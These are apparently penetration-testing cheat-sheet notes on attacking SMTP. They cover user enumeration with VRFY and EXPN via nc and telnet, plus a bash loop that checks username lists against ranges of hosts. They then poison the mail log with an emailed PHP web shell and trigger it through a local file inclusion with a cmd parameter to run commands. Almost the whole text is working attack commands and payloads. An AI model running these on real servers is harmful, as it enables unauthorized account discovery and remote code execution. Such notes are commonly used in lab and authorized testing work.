nc -nv 10.11.12.8 25
VRFY bob
250 2.1.5
bob@redhat.active.com <--- Output if user exists
VRFY idontexist
550 5.1.1 idontexist... User unknow <--- Output if user does not exist
EXPN request: asks the server for the membership of a mailing list
Bash Script for SMTP
#!/bin/bash
# VRFY Script
#############
for ips in $(cat numbers.txt); # numbers.txt list of IP's
do
for user in $(cat users.txt); # users.txt list of usernames
do
echo VRFY $user | nc -nv -w 1 10.11.1.$ips 25 2>/dev/null |grep ^"250"
done
done
telnet 10.10.10.10 25
EHLO sub.somedomain.com
VRFY username@localhost
mail from:someself@nodomain.io
rcpt to: username@localhost
data
Subject: Some Subject
<?php echo system($_REQUEST['cmd']); ?>
.
=================================================
After this and on the LFI you have discovered just place the variable cmd:
?cmd=id
&cmd=id
Examples:
http://10.10.10.10/somedir/lfi.php?file=../../../../../var/log/mail.log&cmd=id
http://10.10.10.10/somedir/lfi.php?file=../../../../../var/log/mail.log&cmd=whoami
